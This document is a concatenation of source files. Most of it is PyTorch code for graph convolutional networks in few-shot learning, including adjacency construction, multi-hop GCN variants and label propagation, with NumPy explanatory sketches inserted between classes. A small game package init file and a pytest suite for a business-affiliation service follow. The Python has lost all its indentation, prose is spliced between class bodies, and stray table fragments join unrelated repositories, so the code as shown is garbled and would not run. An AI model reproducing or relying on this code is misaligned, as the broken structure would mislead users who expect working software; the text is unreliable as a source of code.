_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
        for num in range(N):  # keep only the largest K elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
aifa = F.softmax(torch.cat([self.aifa1,self.aifa2,self.aifa3],dim=0),dim=0)
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
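The last step of `MultiAdjacencyCompute` blends the identity, the normalized adjacency, and its square with softmax-normalized learnable weights. A minimal NumPy sketch of that mixing step (the function name and the toy 3-node graph are illustrative, not from the original code):

```python
import numpy as np

def mix_adjacency(a_hat, coeffs):
    """Blend I, A_hat and A_hat^2 with softmax-normalized coefficients."""
    n = a_hat.shape[0]
    e = np.exp(coeffs - np.max(coeffs))
    alpha = e / e.sum()  # softmax over the three raw weights
    return alpha[0] * np.eye(n) + alpha[1] * a_hat + alpha[2] * (a_hat @ a_hat)

# Toy symmetrically-normalized adjacency for a 3-node path graph
a = np.array([[0., 1., 0.], [1., 0., 1.], [0., 1., 0.]]) + np.eye(3)  # add self-loops
d = a.sum(axis=1)
a_hat = a / np.sqrt(np.outer(d, d))  # D^{-1/2} (A + I) D^{-1/2}
mixed = mix_adjacency(a_hat, np.zeros(3))  # zero raw weights -> equal thirds
```

With all raw weights at zero (as the `aifa` parameters are initialized above), the softmax gives each hop an equal share of 1/3.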
# Improvement 4: multi-graph GCN (A + A^2), final version
class MultiGCN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
x = self.gcn(A, features)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
aifa = F.softmax(torch.cat([self.aifa1, self.aifa2, self.aifa3], dim=0), dim=0)
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
# Improvement 4: multi-graph GCN (A + A^2), final version, undirected graph
class MGCN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency0_T = adjacency0.t()
adjacency0 = torch.mul(adjacency0, adjacency0_T)
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
aifa = F.softmax(torch.cat([self.aifa1, self.aifa2, self.aifa3], dim=0), dim=0)
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
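The `MGCN` variant above symmetrizes the top-k graph by keeping only mutual edges (`adjacency0 * adjacency0.T`). A minimal NumPy sketch of that mutual-kNN masking (the toy similarity matrix is illustrative):

```python
import numpy as np

def mutual_knn_mask(similarity, k):
    """Keep edge (i, j) only if j is in i's top-k AND i is in j's top-k."""
    n = similarity.shape[0]
    mask = np.zeros((n, n))
    topk = np.argsort(-similarity, axis=1)[:, :k]  # k most similar per row
    for i in range(n):
        mask[i, topk[i]] = 1.0
    np.fill_diagonal(mask, 0.0)  # drop self-edges, as in the loop above
    return mask * mask.T         # elementwise AND keeps mutual edges only

sim = np.array([[1.0, 0.9, 0.1],
                [0.9, 1.0, 0.8],
                [0.2, 0.8, 1.0]])
mask = mutual_knn_mask(sim, k=2)
```

The elementwise product with the transpose is what makes the resulting graph undirected: a one-sided nearest-neighbour relation is dropped.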
# Improvement 4: multi-graph GCN (A + A^2), final version
class MultiGCN_temp(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
aifa = F.softmax(torch.cat([self.aifa1, self.aifa2, self.aifa3], dim=0), dim=0)
adjacency = aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
# Improvement 4: multi-graph GCN (A + A^2), final version
class MultiGCN_temp2(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
aifa = F.softmax(torch.cat([self.aifa1, self.aifa2, self.aifa3], dim=0), dim=0)
adjacency = torch.eye(N).cuda()
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
# Improvement 4: ProtoGCN, final version
class ProtoGCN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
#x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
#
# A = self.MultiAdjacencyCompute(x)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / self.test_N_way), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacency = torch.mm(torch.mm(inv_D, adjacency),inv_D)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
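For reference, the standard GCN renormalization is D^{-1/2}(A + I)D^{-1/2}; the method above additionally adds 1 to each degree (`d = d + 1`) before the square root. A minimal NumPy sketch of the standard form (the toy 3-node path graph is illustrative):

```python
import numpy as np

def normalize_adjacency(a):
    """Symmetric normalization D^{-1/2} A D^{-1/2} of an adjacency with self-loops."""
    d = a.sum(axis=1)
    inv_sqrt_d = 1.0 / np.sqrt(d)
    # outer product applies the row and column scaling in one step
    return a * np.outer(inv_sqrt_d, inv_sqrt_d)

a = np.eye(3) + np.array([[0., 1., 0.], [1., 0., 1.], [0., 1., 0.]])
a_hat = normalize_adjacency(a)
```

The normalized matrix stays symmetric and its entries are bounded, which keeps repeated propagation (A_hat, A_hat^2, ...) numerically stable.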
# Improvement 4: ProtoIGCN, final version
class ProtoIGCN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
# self.bn3 = nn.BatchNorm1d(input_dim)
# self.bn4 = nn.BatchNorm1d(1600)
self.gcn = GraphConvolution(input_dim, 1000)
# self.sigama1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
# self.sigama2 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
#x = self.bn1(torch.mm(A,features))
x = self.bn1(torch.mm(A,features))
x = F.relu(x)
A = self.MultiAdjacencyCompute(x)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, x)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacency = torch.mm(torch.mm(inv_D, adjacency),inv_D)
adjacency = torch.mm(adjacency,adjacency)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
# Improvement 4: ProtoGCN, final version
class GNN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gnn = Graphprogate(input_dim, 1000)
self.test_N_way = N_way
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
#x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
#
# A = self.MultiAdjacencyCompute(x)
# x = self.bn2(torch.mm(A,x))
x = self.gnn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / self.test_N_way), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacency = torch.mm(torch.mm(inv_D, adjacency),inv_D)
return adjacency
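The adjacency in each `MultiAdjacencyCompute` above is built from a Gaussian kernel over pairwise feature distances, W_ij = exp(-||x_i - x_j||^2 / sigma^2) with sigma^2 = 9. A self-contained NumPy sketch of that kernel (toy inputs are illustrative):

```python
import numpy as np

def gaussian_adjacency(features, sigma2=9.0):
    """Dense Gaussian-kernel affinities: W_ij = exp(-||x_i - x_j||^2 / sigma2)."""
    sq = np.sum(features ** 2, axis=1)
    # pairwise squared distances via the expansion ||x-y||^2 = x.x + y.y - 2 x.y
    d2 = sq[:, None] + sq[None, :] - 2.0 * features @ features.T
    d2 = np.maximum(d2, 0.0)  # guard against tiny negative values from rounding
    return np.exp(-d2 / sigma2)

x = np.array([[0.0, 0.0], [3.0, 0.0]])
w = gaussian_adjacency(x)
```

This avoids the O(N^2 d) memory of the `repeat`-based distance computation used in the original code, which materializes an (N*N, d) tensor.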
class RelationNetwork(nn.Module):
"""Graph Construction Module"""
def __init__(self):
super(RelationNetwork, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, padding=1))
self.layer2 = nn.Sequential(
nn.Conv2d(64, 1, kernel_size=3, padding=1),
nn.BatchNorm2d(1),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, padding=1))
self.fc3 = nn.Linear(2 * 2, 8)
self.fc4 = nn.Linear(8, 1)
self.m0 = nn.MaxPool2d(2) # max-pool without padding
self.m1 = nn.MaxPool2d(2, padding=1) # max-pool with padding
def forward(self, x):
x = x.view(-1, 64, 5, 5)
out = self.layer1(x)
out = self.layer2(out)
# flatten
out = out.view(out.size(0), -1)
out = F.relu(self.fc3(out))
out = self.fc4(out) # no relu
out = out.view(out.size(0), -1) # bs*1
return out
# Improvement 4: multi-graph GCN (A + A^2), final version, sigma is trained
eps = np.finfo(float).eps
class MultiGCN_sigma(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.sigma = 3
self.relation = RelationNetwork()
self.reset_parameters_kaiming()
def forward(self,features):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
self.sigma = self.relation(features)
emb_all = features / (self.sigma + eps) # N*d
emb1 = torch.unsqueeze(emb_all, 1) # N*1*d
emb2 = torch.unsqueeze(emb_all, 0) # 1*N*d
W = ((emb1 - emb2) ** 2).mean(2) # N*N*d -> N*N
adjacency_e = torch.exp(-W / 2)
#temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
#sigma_2 = (self.sigma + eps)*(self.sigma + eps)
#adjacency_e = torch.exp(-temp.pow(2) / sigma_2).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
aifa = F.softmax(torch.cat([self.aifa1, self.aifa2, self.aifa3], dim=0), dim=0)
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
# Improvement 4: multi-graph GCN (A + A^2), final version, combined with label propagation
class MultiGCN_progation(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.alpha = nn.Parameter(torch.tensor(0.5).cuda(0), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features, s_label):
# A = self.MultiAdjacencyCompute(features)
# #x = self.bn1(torch.mm(A,features))
# x = self.bn1(torch.mm(A,features))
#
# x = F.relu(x)
A = self.MultiAdjacencyCompute(features)
# x = self.bn2(torch.mm(A,x))
x = self.gcn(A, features)
#x = torch.mm(A,x)
# x = F.relu(self.bn2(x))
# x = F.dropout(x, 0.6, training=self.training)
# Step3: Label Propagation, F = (I-\alpha S)^{-1}Y
pred_label = self.progation_label(x,s_label)
return pred_label
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
aifa = F.softmax(torch.cat([self.aifa1, self.aifa2, self.aifa3], dim=0), dim=0)
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def AdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 30).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None)
adjacency0 = torch.zeros(N, N).cuda()
for num in range(N):  # keep the K largest elements in each row
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency), inv_D)
return adjacencyn  # return the normalized matrix; the unnormalized one was returned by mistake
def progation_label(self, features, s_labels):
eps = np.finfo(float).eps
num_classes = len(np.unique(s_labels.cpu()))
num_support = int(s_labels.shape[0] / num_classes)
len_query = features.shape[0] - s_labels.shape[0]
s_labels = s_labels.unsqueeze(dim=1)
temp_labels = torch.zeros(num_support*num_classes,num_classes).cuda()
s_labels = temp_labels.scatter_(1,s_labels,1)
S = self.AdjacencyCompute(features)
ys = s_labels
yu = torch.zeros(len_query, num_classes).cuda(0)
# yu = (torch.ones(num_classes*num_queries, num_classes)/num_classes).cuda(0)
y = torch.cat((ys, yu), 0)
N = S.shape[0]
F_all = torch.matmul(torch.inverse(torch.eye(N).cuda(0) - self.alpha * S + eps), y)
Fq = F_all[num_classes * num_support:, :] # query predictions
return F_all, Fq
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
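`progation_label` uses the closed-form label-propagation solution F = (I - alpha*S)^{-1} Y. A NumPy sketch on a toy 3-node graph (names are illustrative; `np.linalg.solve` is used instead of an explicit inverse for numerical stability):

```python
import numpy as np

def propagate_labels(S, y_support, n_query, alpha=0.5):
    """Closed-form label propagation: F = (I - alpha*S)^{-1} Y."""
    n_classes = y_support.shape[1]
    # unknown query labels start as all-zero rows, as in the code above
    y = np.vstack([y_support, np.zeros((n_query, n_classes))])
    n = S.shape[0]
    f_all = np.linalg.solve(np.eye(n) - alpha * S, y)
    return f_all[len(y_support):]  # query predictions only

# Two support nodes (one per class) and one query connected to class 0
S = np.array([[0.0, 0.0, 0.9],
              [0.0, 0.0, 0.0],
              [0.9, 0.0, 0.0]])
y_s = np.eye(2)  # one-hot labels for the two support nodes
f_q = propagate_labels(S, y_s, n_query=1)
```

The query node, linked only to the class-0 support node, receives a higher score for class 0.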
if __name__=='__main__':
# input_dim must match the feature dimension of the test tensor below (1600)
model = GNN(input_dim=1600, N_way=10).cuda()
model_MGNN = MultiGCN(input_dim=1600, N_way=10).cuda()
feature = torch.randn(200, 1600).cuda()
feature1 = model(feature)
feature2 = model_MGNN(feature)
print('# GNN parameters:', sum(param.numel() for param in model.parameters()))
print('# MultiGCN parameters:', sum(param.numel() for param in model_MGNN.parameters()))
# --- File: src/player/__init__.py (repo: ProfessorQu/Risky-Robots, license: MIT) ---
] | null | null | null | from src.player.healthbar import HealthBar
from src.player.player import Player
from src.player.inputs import Inputs
from src.player.weapon import Weapon
# --- File: auth-api/tests/unit/services/test_affiliation.py (repo: jeznorth/sbc-auth, license: Apache-2.0) ---
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Affiliation service.
Test suite to ensure that the Affiliation service routines are working as expected.
"""
from unittest.mock import patch
import pytest
from auth_api.exceptions import BusinessException
from auth_api.exceptions.errors import Error
from auth_api.models.affiliation import Affiliation as AffiliationModel
from auth_api.models.org import Org as OrgModel
from auth_api.services import Affiliation as AffiliationService
from tests.utilities.factory_scenarios import TestEntityInfo, TestOrgTypeInfo
from tests.utilities.factory_utils import factory_entity_service, factory_org_service
def test_create_affiliation(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can be created."""
entity_service = factory_entity_service(entity_info=TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
affiliation = AffiliationService.create_affiliation(org_id, business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
assert affiliation
assert affiliation.entity.identifier == entity_service.identifier
assert affiliation.as_dict()['org']['id'] == org_dictionary['id']
def test_create_affiliation_no_org(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created without org."""
entity_service = factory_entity_service()
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(None, business_identifier, {})
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_create_affiliation_no_entity(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created without entity."""
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(org_id, None, {})
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_create_affiliation_implicit(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an Affiliation can not be created when org is IMPLICIT."""
entity_service1 = factory_entity_service()
entity_dictionary1 = entity_service1.as_dict()
business_identifier1 = entity_dictionary1['businessIdentifier']
org_service = factory_org_service(org_type_info=TestOrgTypeInfo.implicit)
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
pass_code = '111111111'
with pytest.raises(BusinessException) as exception:
AffiliationService.create_affiliation(org_id, business_identifier1, pass_code, {})
found_org = OrgModel.query.filter_by(id=org_id).first()
assert found_org is None
assert exception.value.code == Error.INVALID_USER_CREDENTIALS.name
